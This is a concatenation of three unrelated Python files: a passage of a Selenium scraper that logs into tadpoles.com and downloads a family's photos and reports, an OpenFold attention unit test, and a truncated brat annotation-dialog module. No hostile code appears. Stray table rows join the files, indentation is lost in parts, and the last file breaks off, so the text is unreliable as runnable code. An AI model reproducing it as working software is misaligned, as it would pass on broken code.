# e.g. {'jan':'01', 'feb':'02', ...}
self.month_lookup = {month: "{:02d}".format(Client.MONTHS.index(month)+1) for month in Client.MONTHS}
def config_login_info(self):
return self.config['AUTHENTICATION']
def config_requests_info(self):
return self.config['DOWNLOADS']
def init_logging(self):
"""Set up logging configuration"""
# Create logging dir
directory = dirname('logs/')
if not isdir(directory):
os.makedirs(directory)
logging_config = dict(
version=1,
formatters={
'f': {
'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'}
},
handlers={
'h': {
'class': 'logging.StreamHandler',
'formatter': 'f',
'level': logging.DEBUG
},
'f': {
'class': 'logging.FileHandler',
'formatter': 'f',
'filename': 'logs/tadpole.log',
'level': logging.INFO}
},
root={
'handlers': ['h', 'f'],
'level': logging.DEBUG,
},
)
logging.config.dictConfig(logging_config)
self.logger = logging.getLogger('tadpole-catcher')
def __enter__(self):
self.logger.info("Starting browser")
self.browser = webdriver.Chrome()
self.browser.implicitly_wait(10)
self.logger.info("Got a browser")
return self
def __exit__(self, *args):
self.logger.info("Shutting down browser")
self.browser.quit()
def sleep(self, minsleep=None, maxsleep=None):
"""Sleep a random amount of time bound by the min and max value"""
_min = minsleep or self.MIN_SLEEP
_max = maxsleep or self.MAX_SLEEP
duration = randrange(_min * 100, _max * 100) / 100.0
self.logger.info('Sleeping %r', duration)
time.sleep(duration)
def navigate_url(self, url):
"""Force the browser to go a url"""
self.logger.info("Navigating to %r", url)
self.browser.get(url)
def load_cookies(self):
"""Load cookies from a previously saved ones"""
self.logger.info("Loading cookies.")
with open(self.COOKIE_FILE, "rb") as file:
self.cookies = pickle.load(file)
def dump_cookies(self):
"""Save cookies of the existing session to a file"""
self.logger.info("Dumping cookies.")
self.cookies = self.browser.get_cookies()
with open(self.COOKIE_FILE, "wb") as file:
pickle.dump(self.browser.get_cookies(), file)
def add_cookies_to_browser(self):
"""Load the saved cookies into the browser"""
self.logger.info("Adding the cookies to the browser.")
for cookie in self.cookies:
if self.browser.current_url.strip('/').endswith(cookie['domain']):
self.browser.add_cookie(cookie)
def requestify_cookies(self):
"""Transform the cookies to what the request lib requires."""
self.logger.info("Transforming the cookies for requests lib.")
self.req_cookies = {}
for s_cookie in self.cookies:
self.req_cookies[s_cookie["name"]] = s_cookie["value"]
def switch_windows(self):
'''Switch to the other window.'''
self.logger.info("Switching windows.")
all_windows = set(self.browser.window_handles)
current_window = set([self.browser.current_window_handle])
other_window = (all_windows - current_window).pop()
self.browser.switch_to.window(other_window)
def get_current_child(self):
return self.get_children_params()[self.current_child_ind]
def get_child_name(self):
display_name = self.get_current_child()['display_name']
return display_name.split(' ')[0]
def get_num_children(self):
return len(self.get_children_params())
def get_children_params(self):
#tadpoles does not provide the children attribute if there is only one child
if 'children' in self.app_params:
return self.app_params['children']
else:
#if there is only one child, provide default parameters
return [{'display_name': 'child'}]
def has_next_child(self):
return self.current_child_ind+1 < self.get_num_children()
# add 1 to current child index, and reset to 0 if too many
def next_child(self):
if self.has_next_child():
self.current_child_ind+=1
else:
self.current_child_ind=0
def do_login(self):
"""Perform login to tadpole (without Google SSO)"""
self.logger.info("Navigating to login page.")
self.browser.find_element_by_id("login-button").click()
self.browser.find_element_by_class_name("tp-block-half").click()
self.browser.find_element_by_class_name("other-login-button").click()
# Get email, password, and submit elements
form = self.browser.find_element_by_class_name("form-horizontal")
email_form = self.find_by_xpath('//input[@type="text"]', 'Email field', form)
pwd_form = self.find_by_xpath('//input[@type="password"]', 'Password field', form)
submit = self.find_by_xpath('//button[@type="submit"]', 'Submit button', form)
# Fill out info and submit
email = self.config_login_info()['username']
pwd = self.config_login_info()['password']
if email is '' or pwd is '':
self.logger.info("'settings.ini' does not contain authentication information. Falling back to user-inputted values.")
email = input("Enter email: ")
pwd = input("Enter password: ")
email_form.send_keys(email)
pwd_form.send_keys(pwd)
self.logger.info("Clicking 'submit' button.")
submit.click()
self.logger.info("Sleeping 2 seconds.")
self.sleep(minsleep=2)
def iter_monthyear(self):
'''Yields pairs of xpaths for each year/month tile on the
right hand side of the user's home page.
'''
month_xpath_tmpl = '//*[@id="app"]/div[3]/div[1]/ul/li[%d]/div/div/div/div/span[%d]'
month_index = 1
while True:
month_xpath = month_xpath_tmpl % (month_index, 1)
year_xpath = month_xpath_tmpl % (month_index, 2)
# Go home if not there already.
if self.browser.current_url != self.HOME_URL:
self.navigate_url(self.HOME_URL)
# Find the next month and year elements.
month = self.find_by_xpath(month_xpath, "any more months")
year = self.find_by_xpath(year_xpath, "any more years")
self.__current_month__ = month
self.__current_year__ = year
yield month
month_index += 1
def iter_urls(self):
    '''Find all the image urls on the current page.

    Generator: walks every month tile (via iter_monthyear) and every
    child, yielding Image objects and Report objects found on each
    child's timeline.  Images seen before a report get that report's
    date applied before being yielded.
    '''
    if self.download_reports:
        # Click the "All" button, so reports are included in our iterator
        self.sleep(1, 3)  # Ensure page is loaded
        self.logger.info("Clicking 'All' button to load reports")
        all_btn = self.find_by_xpath('//*[@id="app"]/div[3]/div[2]/div[1]/div[2]/ul/li[1]', "'All' button on the Timeline")
        all_btn.click()
    # For each month on the dashboard...
    for month in self.iter_monthyear():
        # Navigate to the next month.
        month.click()
        self.logger.info("Getting urls for month: %s", month.text)
        self.sleep(minsleep=5, maxsleep=7)
        # For each child...
        for child in range(self.get_num_children()):
            # Click on child if needed
            if(self.get_num_children() > 1):
                self.logger.info("Clicking on %s's page", self.get_child_name())
                # 0 -> 2nd li, 1 -> 3rd li, etc.
                cur_child_xpath = '//*[@id="app"]/div[2]/div[3]/ul/li[%s]/li/div' % str(self.current_child_ind+2)
                current_child = self.find_by_xpath(cur_child_xpath, "link to %s's page" % self.get_child_name())
                # click events are only activated on mouseover
                chain = ActionChains(self.browser).move_to_element_with_offset(current_child, 5, 5).click()
                chain.perform()
            # Bools to correctly identify reports and images:
            # a report div has no media url but mentions 'report';
            # an image div's url matches a 'thumbnail' link.
            report = lambda div: (not Image.url_search(div)) and ('report' in div.get_attribute('outerText'))
            image = lambda div: Image.url_search(div) and ('thumbnail' in Image.url_search(div).group(1))
            elements = self.browser.find_elements_by_xpath('//div[@class="well left-panel pull-left"]/ul/li/div')
            # Collect media files until we see a report.
            # Once we see a report, apply that date to all seen media files.
            # Yield processed media files, and then the report.
            # Deal with edge case where no report is found.
            media_buffer = []
            for div in elements:
                if image(div):
                    img = Image(div=div)
                    media_buffer.append(img)
                elif report(div):
                    _report = Report(div=div)
                    # Apply date to all elements in buffer
                    date_text = _report.date_text
                    for img in media_buffer:
                        img.date = int(date_text)
                    # For each image/video, pop from buffer and yield.
                    # NOTE(review): pop() yields the buffered media in
                    # reverse page order — confirm this is intentional.
                    while len(media_buffer) > 0:
                        yield media_buffer.pop()
                    # Once images are processed, yield report div
                    yield _report
            # Handle edge case where there are media files but no report
            while len(media_buffer) > 0:
                yield media_buffer.pop()
            # Goto next child, if possible
            self.next_child()
def save_report(self, report):
    '''Save a daily report to disk as an HTML file.

    Skips the download when the target file already exists; otherwise
    opens the report pop-up in the browser, captures its inner HTML,
    closes the pop-up and writes the markup wrapped in <html> tags.
    '''
    # Build the local file name from the current child/year/month context.
    child_text = self.get_child_name().lower()
    year_text = self.__current_year__.text
    month_text = self.month_lookup[self.__current_month__.text]
    date_text = report.date_text
    # Use the configured download directory so reports land next to the
    # images saved by save_image() (previously hard-coded to 'download',
    # diverging from the 'default_download_dir' setting).
    default_download_dir = self.config_requests_info()['default_download_dir']
    filename_parts = [default_download_dir, child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}.{}']
    filename_report = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, 'html'))
    # Only download if the file doesn't already exist.
    if isfile(filename_report):
        self.logger.info("Already downloaded report: %s", filename_report)
        return
    # Make sure the parent dir exists.
    directory = dirname(filename_report)
    if not isdir(directory):
        os.makedirs(directory)
    self.logger.info("Downloading report: %s", filename_report)
    # Open the report pop-up so its contents get rendered.
    div = report.div
    div.click()
    self.sleep(1, 2)  # Wait for the modal to load
    # Extract the modal's markup.
    body = self.browser.find_element_by_class_name('modal-overflow-wrapper')
    text = body.get_attribute('innerHTML')
    # Close the pop-up again so the timeline stays usable.
    x = self.find_by_xpath('//*[@id="dr-modal-printable"]/div[1]/i', 'Close Popup Button')
    x.click()
    # Wait for the modal to disappear.
    self.sleep(1, 2)
    with open(filename_report, 'w', encoding='UTF-8') as report_file:
        self.logger.info("Saving: %s", filename_report)
        report_file.write("<html>")
        report_file.write(text)
        report_file.write("</html>")
    self.logger.info("Finished saving: %s", filename_report)
def save_image(self, img):
    '''Save an image or video locally using requests.

    The extension (jpg/png/mp4) is chosen from the response content-type;
    files that already exist under any of the three candidate names are
    never re-downloaded.  Failed requests are retried up to the
    configured 'max_retries', sleeping between attempts.
    '''
    url = img.url
    date_text = img.date_text
    _id = img.id
    year_text = self.__current_year__.text
    month_text = self.month_lookup[self.__current_month__.text]
    child_text = self.get_child_name().lower()
    default_download_dir = self.config_requests_info()['default_download_dir']
    # Make the local filename (one candidate per possible media type).
    filename_parts = [default_download_dir, child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}-{}.{}']

    def _target(ext):
        # Full path for this image with the given extension.
        return abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, ext))

    filename_jpg = _target('jpg')
    # we might even get a png file even though the mime type is jpeg.
    filename_png = _target('png')
    # We don't know yet whether this is a video or an image.
    filename_video = _target('mp4')
    # Only download if the file doesn't already exist (any variant).
    for label, existing in (('image', filename_jpg),
                            ('video', filename_video),
                            ('png file', filename_png)):
        if isfile(existing):
            self.logger.info("Already downloaded %s: %s", label, existing)
            return
    self.logger.info("Downloading from: %s", url)
    # Make sure the parent dir exists.
    directory = dirname(filename_jpg)
    if not isdir(directory):
        os.makedirs(directory)
    # Sleep to avoid bombarding the server.
    self.sleep(1, 3)
    # Map the response content-type to the matching target path.
    target_by_type = {'image/jpeg': filename_jpg,
                      'image/png': filename_png,
                      'video/mp4': filename_video}
    max_retries = int(self.config_requests_info()['max_retries'])
    for _ in range(max_retries):
        resp = requests.get(url, cookies=self.req_cookies, stream=True)
        if resp.status_code != 200:
            self.logger.warning('Error downloading %r. Retrying. Response: %s', url, resp)
            self.sleep(1, 5)
            continue
        content_type = resp.headers['content-type']
        self.logger.info("Content Type: %s.", content_type)
        filename = target_by_type.get(content_type)
        if filename is None:
            self.logger.warning("Unsupported content type: %s", content_type)
            return
        self.logger.info("Saving: %s", filename)
        # 'with' guarantees the handle is closed even if a write fails
        # (the original opened lazily and could log success without
        # ever creating the file).
        with open(filename, 'wb') as out_file:
            for chunk in resp.iter_content(1024):
                out_file.write(chunk)
        self.logger.info("Finished saving %s", filename)
        return
    self.logger.warning("Giving up on %s after %d retries", url, max_retries)
def download_images(self):
    '''Login to tadpoles.com and download all user's images.

    Logs in, shares the browser cookies with requests, then saves every
    Image/Report produced by iter_urls().  Individual download failures
    are logged and skipped; Ctrl-C stops the whole run.
    '''
    self.navigate_url(self.ROOT_URL)
    self.do_login()
    self.dump_cookies()
    self.add_cookies_to_browser()
    self.requestify_cookies()
    # Get application parameters.
    self.app_params = self.browser.execute_script("return tadpoles.appParams")
    self.logger.info("Loaded Tadpoles parameters")
    # Start off with child 0 (if more than one exists).
    self.current_child_ind = 0
    for response in self.iter_urls():
        try:
            if isinstance(response, Image):
                self.save_image(response)
            elif isinstance(response, Report):
                self.save_report(response)
        except DownloadError:
            # Best effort: skip this resource and continue with the rest.
            self.logger.exception("Error while saving resource")
        except KeyboardInterrupt:
            # BUGFIX: the interrupt used to be swallowed per-item so the
            # loop kept downloading; actually stop the run instead.
            self.logger.info("Download interrupted by user")
            break
def find_by_xpath(self, selector, name='element', form=None):
    '''Find an element by XPath, logging which XPath failed on a miss.

    Args:
        selector: the XPath expression to evaluate.
        name: human-readable description used in the log message.
        form: optional element/driver to search under; defaults to the
            whole browser document.

    Exits the process (status 0) when the element cannot be found.
    '''
    if form is None:  # identity check for None instead of '=='
        form = self.browser
    try:
        el = form.find_element_by_xpath(selector)
    except NoSuchElementException:
        self.logger.info("Could not find %s using XPath %s. Stopping.", name, selector)
        sys.exit(0)
    return el
# create a config file if one does not already exist/needs to be reset
def create_config_file(file_name):
    """Write a fresh template configuration to *file_name*.

    The template holds empty credentials plus download defaults; the
    user must fill in authentication details before the scraper can
    log in.
    """
    cfg = ConfigParser()
    cfg['AUTHENTICATION'] = {}
    cfg['AUTHENTICATION']['username'] = ''
    cfg['AUTHENTICATION']['password'] = ''
    cfg['DOWNLOADS'] = {}
    cfg['DOWNLOADS']['max_retries'] = '5'
    cfg['DOWNLOADS']['default_download_dir'] = 'download'
    with open(file_name, 'w') as cfg_file:
        cfg.write(cfg_file)
    print("New configuration file generated!\n")
    # BUGFIX: reference the file actually written instead of the
    # hard-coded 'settings.ini'.
    print("Please edit '{0}' and input your authentication information before continuing to use this script.\n".format(file_name))
# open an already existing config file (assumes correct items)
def read_config_file(file_name):
    """Parse *file_name* and return the resulting ConfigParser.

    Assumes the file contains the expected sections; a missing file is
    silently ignored by ConfigParser.read, yielding an empty parser.
    """
    parser = ConfigParser()
    parser.read(file_name)
    return parser
if __name__ == "__main__":
    # Entry point: load settings.ini (or create a template on first run),
    # then run the scraper with the parsed configuration.
    settings = 'settings.ini'
    config = None
    if isfile(settings):
        config = read_config_file(settings)
    else:
        # First run: write a template config and stop so the user can
        # fill in credentials before starting the scraper.
        create_config_file(settings)
        input("Press any key to exit.")
        exit()
    with Client(config) as client:
        client.download_images()
| 20,461 | 5,911 |
# Copyright 2021 AlQuraishi Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import unittest
from openfold.model.primitives import (
Attention,
)
from tests.config import consts
class TestLMA(unittest.TestCase):
    """Compare low-memory attention (LMA) against the standard path.

    Runs the same Attention module with and without use_lma on random
    CUDA tensors and checks the outputs agree within consts.eps.
    """

    def test_lma_vs_attention(self):
        batch_size = consts.batch_size
        c_hidden = 32
        n = 2**12
        no_heads = 4
        q = torch.rand(batch_size, n, c_hidden).cuda()
        kv = torch.rand(batch_size, n, c_hidden).cuda()
        # Single per-head bias broadcast over the query dimension.
        bias = [torch.rand(no_heads, 1, n).cuda()]
        # Removed the unused gating_fill / o_fill tensors from the
        # original; they were never consumed.
        a = Attention(
            c_hidden, c_hidden, c_hidden, c_hidden, no_heads
        ).cuda()
        with torch.no_grad():
            lma_out = a(q, kv, biases=bias, use_lma=True)
            ref_out = a(q, kv, biases=bias)
        self.assertTrue(torch.max(torch.abs(lma_out - ref_out)) < consts.eps)
# Allow running this test module directly with `python <file>`.
if __name__ == "__main__":
    unittest.main()
| 1,598 | 552 |
from projectconfig import TypeHierarchyNode, ProjectConfiguration
from annotation import Annotations,TextLevelAnnotation, SimpleAnnotations
from message import Messager
from ApplicationScope import getAnnObject
class NoTextLevelConf(Exception):
    """Raised when the project configuration defines no text level annotations."""

    def __init__(self):
        super(NoTextLevelConf, self).__init__()

    def __str__(self):
        return u'No text level annotations defined in configuration'
class noValidAnswer(Exception):
    """Raised when a submitted answer id is not part of the current list."""

    def __init__(self, answer):
        super(noValidAnswer, self).__init__()
        # The offending answer id, kept for the error message.
        self.answer = answer

    def __str__(self):
        return u'%s is not a valid answer' % (self.answer)
class noValidNextStep(Exception):
    """Raised when an answer points at a next list id that does not exist."""

    def __init__(self, next_step):
        super(noValidNextStep, self).__init__()
        # The unknown next-step id, kept for the error message.
        self.next_step = next_step

    def __str__(self):
        return u'%s is not a valid next step, check configuration' % (self.next_step)
class TextAnnotations(object):
    '''Main entry point for text level annotations.

    Reads the project configuration and builds the answer definitions
    ("Def"), answer lists ("List" — also dialog entry points) and
    sublists ("SubList") needed to drive the annotation dialog, then
    replays any existing annotations onto the matching start lists.
    '''

    def __init__(self, projectconf, ann=""):
        self.projectconf = projectconf
        self.lists = {}        # list id -> AnswerList
        self.defs = {}         # answer id -> Answer
        self.startlists = {}   # entry list id -> StartList
        self.selectedList = None
        # ann is not the entire Annotations object but only a list of
        # text level annotations.
        self.ann = ann
        text_types = []
        try:
            text_types = self.projectconf.get_text_type_hierarchy()
        except KeyError:
            raise NoTextLevelConf()
        for i in text_types:
            if i.terms[0] == "Def":
                answer = Answer(i.arguments["id"][0], i.arguments["text"][0])
                self.defs[answer.id] = answer
            elif i.terms[0] == "List":
                answers = {}
                nexts = {}
                index = 0
                for answer in i.arguments["defs"]:
                    answers[answer] = self.defs[answer]
                    nexts[answer] = i.arguments["next"][index]
                    index += 1
                lst = AnswerList(i.arguments["id"][0], i.arguments["name"][0], answers, nexts)
                self.lists[lst.id] = lst
                self.startlists[lst.id] = StartList(self.defs, self.lists, lst)
            elif i.terms[0] == "SubList":
                answers = {}
                # BUGFIX: start a fresh next-step mapping for every
                # sublist.  Previously the 'nexts' dict of the preceding
                # "List" leaked into this branch and was mutated here,
                # cross-contaminating AnswerLists (and raising NameError
                # when a SubList preceded any List).
                nexts = {}
                index = 0
                check = False
                if "checkboxes" in i.arguments and i.arguments["checkboxes"][0] == "True":
                    check = True
                for answer in i.arguments["defs"]:
                    answers[answer] = self.defs[answer]
                    if not check:
                        nexts[answer] = i.arguments["next"][index]
                        index += 1
                    else:
                        # Checkbox sublists share a single next step.
                        nexts[answer] = i.arguments["next"][0]
                lst = AnswerList(i.arguments["id"][0], i.arguments["name"][0], answers, nexts, True, check)
                self.lists[lst.id] = lst
        for annotation in self.ann:
            # TODO: Correct error if type is not found
            for i in self.startlists:
                if self.startlists[i].start.name == annotation.type:
                    self.startlists[i].set_ann(annotation)
                    break

    def set_ann(self, annotations):
        '''Attach existing annotations and replay them onto the start lists.'''
        self.ann = annotations
        for annotation in self.ann:
            # TODO: Correct error if type is not found
            for i in self.startlists:
                if self.startlists[i].start.name == annotation.type:
                    self.startlists[i].set_ann(annotation)
                    break

    def select(self, _id, start_list=None, current_list=None):
        '''Apply a selection.

        Without *start_list*, _id[0] names the entry list to open and its
        start AnswerList is returned; otherwise the selection is delegated
        to the named StartList and the resulting list (or "stop") returned.
        '''
        if not start_list:
            self.selectedList = self.startlists[_id[0]]
            return self.startlists[_id[0]].start
        elif start_list:
            self.selectedList = self.startlists[start_list]
            return self.selectedList.select(_id, current_list)

    def unselect(self, start_list, current_id):
        '''Undo the answer at *current_id* on *start_list*.

        Returns the list to display next, or None when there is nothing
        left to undo.
        '''
        self.selectedList = self.startlists[start_list]
        if self.selectedList.followed_path:
            return self.selectedList.unselect(current_id)
        else:
            return None
class StartList(object):
    '''Tracks one dialog run: the entry AnswerList, the list currently
    shown, and the ordered path of lists the user has answered so far.
    '''
    def __init__(self, defs, lists, currentList, ann=""):
        self.defs = defs                  # answer id -> Answer
        self.lists = lists                # list id -> AnswerList
        self.start = currentList          # entry list of this dialog
        self.currentList = currentList    # list shown now ("stop" when finished)
        self.followed_path = []           # ids of lists answered, in order
        self.ann = ann                    # backing TextLevelAnnotation (or "")
    def set_ann(self, annotation):
        '''Replay a stored annotation so the in-memory state matches it.'''
        self.ann = annotation
        if self.ann:
            for id_ in self.ann.ids:
                ids = id_.split(';')
                if 'input' in ids:
                    # Free-text answer: the typed text is stored after the
                    # last '|' of the annotation tail.
                    text = self.ann.tail.split("|")[-1]
                    self.currentList.set_input(text)
                    self.followed_path.append(self.currentList.id)
                else:
                    self.select(ids, self.currentList.id)
    def select(self, _id, current_list):
        '''Record answers *_id* on *current_list* and advance.

        Returns the next AnswerList to display, or the string "stop".
        Raises noValidNextStep when the configured next list is unknown.
        '''
        try:
            next_step, changed = self.lists[current_list].select(_id)
        except:
            raise
        # Will remove all following answers if one is changed
        if changed:
            found = False
            new_path = []
            for i in self.followed_path:
                if found:
                    # Everything answered after the changed list is stale.
                    self.lists[i].clear()
                else:
                    new_path.append(i)
                if i == current_list:
                    found = True
            self.followed_path = new_path
        if not current_list in self.followed_path:
            self.followed_path.append(current_list)
        if(not next_step == "stop"):
            try:
                self.currentList = self.lists[next_step]
            except:
                raise noValidNextStep(next_step)
        else:
            self.currentList = "stop"
        #~ if not self.currentList == "stop":
        #~ try:
        #~ next_step = self.currentList.select(_id)
        #~ except:
        #~ raise noValidAnswer(_id)
        #~ self.followed_path.append(self.currentList.id)
        #~ if(not next_step == "stop"):
        #~ try:
        #~ self.currentList = self.lists[next_step]
        #~ except:
        #~ raise noValidNextStep(next_step)
        #~ else:
        #~ self.currentList = "stop"
        return self.currentList
    def unselect(self, current_id):
        '''Step back to the list answered before *current_id*.

        From the "stop" state this reopens the last answered list.
        Returns the list to display, or None when already at the start.
        '''
        index = 0
        found = False
        if current_id == 'stop':
            self.currentList = self.lists[self.followed_path[-1]]
            return self.currentList
        for i in self.followed_path:
            if i == current_id:
                found = True
                break
            index += 1
        if index == 0:
            # current_id is the first answered list: nothing before it.
            return None
        index -= 1
        self.currentList = self.lists[self.followed_path[index]]
        #~ self.currentList = self.start
        #~ if self.ann and len(self.ann.ids) >= 1:
        #~ for id_ in self.ann.ids[:-1]:
        #~ self.select(id_.split(';'),self.currentList.id)
        return self.currentList
class AnswerList(object):
    """One step of the annotation dialog: a set of selectable answers.

    Every answer id maps to a next step — the id of another (sub)list or
    the string "stop".  The currently selected answer ids and their
    display texts are tracked on the instance.
    """

    def __init__(self, id, name, answers, next_steps, sublist=False, checkboxes=False):
        self.name = name
        self.id = id
        self.answers = answers      # answer id -> Answer
        self.nexts = next_steps     # answer id -> next list id or "stop"
        self.sublist = sublist
        self.checkboxes = checkboxes
        self.answerids = []
        self.answertext = []

    def select(self, _id):
        """Record the selection *_id* (a list of answer ids).

        Returns a (next_step, changed) pair; *changed* is True when a
        previously chosen answer was replaced by one leading to a
        different next step (checkbox lists never report a change).
        """
        previous = self.answerids
        changed = (not self.checkboxes
                   and bool(previous)
                   and self.nexts[_id[0]] != self.nexts[previous[0]])
        # Empty entries occur when no checkbox was ticked; skip them.
        chosen = [i for i in _id if i]
        self.answerids = chosen
        self.answertext = [self.answers[i].text for i in chosen]
        if self.checkboxes:
            # All checkbox answers share one next step, and _id may be
            # empty here, so return the step of any configured answer.
            for key in self.nexts:
                return self.nexts[key], changed
        return self.nexts[_id[0]], changed

    def set_input(self, _input):
        """Store free text typed by the user instead of a fixed answer."""
        self.answerids = ['input']
        self.answertext = [_input]

    def get_ids(self):
        """Selected answer ids joined with ';'."""
        return ';'.join(self.answerids)

    def get_texts(self):
        """Selected answer texts joined with ';'."""
        return ';'.join(self.answertext)

    def clear(self):
        """Forget any selection made on this list."""
        self.answerids = []
        self.answertext = []

    def __str__(self):
        return u'%s\t%s' % (self.id, self.name)
class Answer(object):
    """A single answer definition: an identifier plus its display text."""

    def __init__(self, id, text):
        self.id = id
        self.text = text

    def __str__(self):
        return u'%s\t%s' % (self.id, self.text)
def get_list(path,doc):
    # Return the serialised state of the currently shown list for *doc*.
    try:
        from os.path import join as path_join
        from document import real_directory
        real_dir = real_directory(path)
    except:
        # Outside the brat server (e.g. standalone runs) treat the path
        # as the directory itself.
        real_dir=path
    ann =getAnnObject(path,doc)
    proj = ProjectConfiguration(real_dir)
    try:
        txt_lvl = TextAnnotations(proj,ann.get_textLevels())
    except NoTextLevelConf as e:
        return {'exception' :str(e) }
    #~ if txt_lvl.currentList == "stop":
    #~ return {'stop':True, 'annotation':str(txt_lvl.selectedList.ann),}
    # NOTE(review): TextAnnotations.__init__ sets selectedList to None and
    # nothing on this code path assigns it, so the attribute access below
    # looks like it raises AttributeError — verify against callers.
    response = list_to_dict(txt_lvl.selectedList.currentList)
    #Back_pos tells if there is still atleast 1 answer left that can be removed
    # NOTE(review): TextAnnotations has no 'followed_path' attribute
    # (StartList does) — presumably txt_lvl.selectedList.followed_path was
    # intended; confirm.
    response["back_pos"] = False
    if len(txt_lvl.followed_path) >0 :
        response["back_pos"] = True
    return response
def get_startlist(path, doc):
    """Return a dict describing all dialog entry lists for *doc* at *path*."""
    try:
        from document import real_directory
        real_dir = real_directory(path)
    except:
        # Standalone use: treat the path as the directory itself.
        real_dir = path
    annotations = getAnnObject(path, doc)
    project = ProjectConfiguration(real_dir)
    try:
        txt_lvl = TextAnnotations(project, annotations.get_textLevels())
    except NoTextLevelConf as e:
        return {'exception': str(e)}
    response = startlist_to_dict(txt_lvl.startlists)
    # Back_pos tells the client whether an answer can still be removed;
    # nothing has been answered yet on a fresh start list.
    response["back_pos"] = False
    return response
def select(path,doc,_id,start_list=None, current_list=None):
    # Handle a user's answer selection and persist it to the annotation
    # file.  _id arrives as a JSON-encoded list of answer ids.
    try:
        from os.path import join as path_join
        from document import real_directory
        real_dir = real_directory(path)
    except:
        real_dir=path
    proj = ProjectConfiguration(real_dir)
    try:
        import simplejson as json
        _id = json.loads(_id)
        txt_lvl = TextAnnotations(proj)
        if start_list:
            answerlist = txt_lvl.startlists[start_list].start
            with getAnnObject(path, doc) as ann:
                ann_txtLvl = ann.get_textLevels()
                annotation = None
                # Reuse the annotation for this start list if present,
                # otherwise create a fresh 'F' annotation for it.
                for i in ann_txtLvl:
                    if i.type == answerlist.name:
                        annotation = i
                if not annotation:
                    ann_id = ann.get_new_id('F')
                    ann.add_annotation(TextLevelAnnotation(ann_id, answerlist.name,[]))
                    annotation = ann.get_ann_by_id(ann_id)
                ann_txtLvl = ann.get_textLevels()
                txt_lvl.set_ann(ann_txtLvl)
                response = txt_lvl.select(_id,start_list,current_list)
                update_annotations(ann,annotation, txt_lvl.startlists[start_list])
        else:
            ann = getAnnObject(path,doc)
            ann_txtLvl = ann.get_textLevels()
            if ann_txtLvl:
                txt_lvl.set_ann(ann_txtLvl)
            response = txt_lvl.select(_id,start_list)
    except Exception,e :
        raise
        # NOTE(review): unreachable — the bare `raise` above re-raises the
        # exception, so this error payload is never returned.  Drop either
        # the `raise` or this return depending on the intended behaviour.
        return {'exception' :str(e) }
    if response == "stop":
        # Dialog finished: ship the final annotation string.
        return {'stop':True , 'annotation':str(txt_lvl.selectedList.ann),}
    return list_to_dict(response)
def unselect(path, doc, start_list, current_id):
    """Undo the most recent answer on *start_list* for document *doc*.

    Returns the serialised list to show next, falling back to the start
    list overview when nothing is left to undo.
    """
    try:
        from document import real_directory
        real_dir = real_directory(path)
    except:
        real_dir = path
    from message import Messager
    with getAnnObject(path, doc) as ann:
        proj = ProjectConfiguration(real_dir)
        ann_txtLvls = ann.get_textLevels()
        if not ann_txtLvls:
            # Nothing annotated yet: show the dialog entry points.
            return get_startlist(path, doc)
        txt_lvl = TextAnnotations(proj, ann_txtLvls)
        previous_list = txt_lvl.unselect(start_list, current_id)
        if previous_list:
            return list_to_dict(previous_list)
        return get_startlist(path, doc)
def input_text(path,doc,_id,text,start_list, current_list=None):
    # Store a free-text answer for *start_list*, ending the dialog.
    try:
        from os.path import join as path_join
        from document import real_directory
        real_dir = real_directory(path)
    except:
        real_dir=path
    proj = ProjectConfiguration(real_dir)
    txt_lvl = TextAnnotations(proj)
    answerlist = txt_lvl.startlists[start_list].start
    with getAnnObject(path, doc) as ann:
        ann_txtLvls = ann.get_textLevels()
        annotation = None
        # Reuse the existing annotation for this start list if present.
        for i in ann_txtLvls:
            if i.type == answerlist.name:
                annotation = i
        if annotation:
            txt_lvl.set_ann(ann_txtLvls)
        else:
            ann_id = ann.get_new_id('F')
            ann.add_annotation(TextLevelAnnotation(ann_id, answerlist.name,[]))
            annotation = ann.get_ann_by_id(ann_id)
        #~ ann_txtLvls = ann.get_textLevels()
        #~ if annotation.tail:
        #~ annotation.tail += ";"
        # Record the typed text and close the dialog ("stop").
        txt_lvl.startlists[start_list].currentList.set_input(text)
        txt_lvl.startlists[start_list].currentList = 'stop'
        if not current_list in txt_lvl.startlists[start_list].followed_path:
            txt_lvl.startlists[start_list].followed_path.append(current_list)
        update_annotations(ann,annotation, txt_lvl.startlists[start_list])
        #~ annotation.tail += text
        #~ annotation.ids.append(_id)
        return {'stop':True, 'annotation':str(annotation),}
def update_annotations(ann, ann_txtLvl, txt_lvl):
    """Rewrite ann_txtLvl's ids/tail from the answers along txt_lvl's path.

    Deletes the annotation from *ann* entirely when no answers remain.
    """
    path = txt_lvl.followed_path
    if not path:
        ann.del_annotation(ann_txtLvl)
        return 0
    answered = [txt_lvl.lists[step] for step in path]
    ann_txtLvl.ids = [lst.get_ids() for lst in answered]
    # '|' separates per-list answer texts; join avoids the trailing
    # separator the original += loop had to trim off.
    ann_txtLvl.tail = '|'.join(lst.get_texts() for lst in answered)
def list_to_dict(answer_list):
    """Serialise an AnswerList into the dict structure sent to the client.

    Answer ids/texts are emitted in sorted-id order; 'answers' holds
    either the list of selected ids or, for free text input, the typed
    text itself.
    """
    response = {'name': answer_list.name, 'id': answer_list.id,
                'nexts': answer_list.nexts, 'sublist': answer_list.sublist,
                'stop': False, 'checkboxes': answer_list.checkboxes, }
    # sorted() works on both Python 2 and 3; dict.keys() no longer
    # supports in-place .sort() on Python 3.
    keys = sorted(answer_list.answers)
    response['answer_ids'] = list(keys)
    response['answer_texts'] = [answer_list.answers[a].text for a in keys]
    if 'input' in answer_list.answerids:
        # Free-text answer: ship the typed text.
        response['answers'] = answer_list.answertext[0]
    else:
        response['answers'] = answer_list.answerids
    response["back_pos"] = True
    return response
def startlist_to_dict(answer_list):
    """Serialise the available start lists into the client dict structure.

    *answer_list* maps start-list ids to StartList objects; ids/names are
    emitted in sorted-id order.
    """
    response = {'name': '', 'id': '', 'answers': [], 'sublist': False,
                'stop': False, 'checkboxes': False}
